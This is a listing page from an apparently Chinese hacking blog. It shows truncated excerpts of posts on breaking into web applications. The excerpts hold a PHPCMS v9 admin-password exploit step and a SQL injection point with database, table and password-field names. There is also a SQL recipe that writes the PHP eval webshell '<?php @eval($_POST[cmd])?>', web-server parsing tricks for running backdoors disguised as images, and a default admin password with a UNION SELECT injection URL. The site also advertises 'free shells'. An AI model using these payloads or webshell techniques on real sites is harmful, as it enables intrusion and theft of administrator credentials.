iick's blog
  • 首页
  • 给我留言
  • 免费shell
  • 技术文章
  • 网站漏洞
  • 工具合集
  • phpcmsv9最新爆管理密码漏洞

    phpcmsv9最新爆管理密码漏洞

    漏洞形成原因就不多说了 文件在phpcms/api.php 有兴趣的盆友可以多去挖一挖phpcms的洞子主要利用过程:第一步:注册一个用户http://www.iick.blog/index.php?m=member&c=index...
    网站漏洞 12-09-09861
  • 博文非书资料管理系统SQL注射

    博文非书资料管理系统SQL注射

    注射点:http://www.hack990.com/asearch.do?status=showpage&LanguageType=1数据库:proone表段:ACCOUNT字段:ACCID,ACCNAME,PASSWORD,QQ...
    网站漏洞 12-09-06618
  • PHPmywind 后台拿shell

    PHPmywind 后台拿shell

    网上好像有好多的教程的 用数据库执行Create TABLE a (cmd text NOT NULL);Insert INTO a (cmd) VALUES('<?php @eval($_POST[cmd])?>');sel...
    技术文章 12-09-06698

  • IIS 6.0/7.0/7.5、Nginx、Apache 等 Web Service 解析漏洞总结

    [+]IIS 6.0目录解析:/xx.asp/xx.jpg xx.jpg可替换为任意文本文件(e.g. xx.txt),文本内容为后门代码IIS6.0 会将 xx.jpg 解析为 asp 文件。后缀解析:/xx.asp;.jpg...
    技术文章 12-09-06576

  • 北京华盛网站管理系统漏洞

    默认后台:admin/Login.asp默认密码:admin 123456exp:http://www.xxxxx.com/show_pt.asp?id=1568 and 1=2 union select 1,password,3,user...
    网站漏洞 12-09-06599
  • ‹‹
  • ‹
  • 68
  • 69
  • 70
  • 71
  • 72
  • 73
  • 74
  • 75
  • 76
  • 77
  • ›
  • ››

Powered By Www.iick.Blog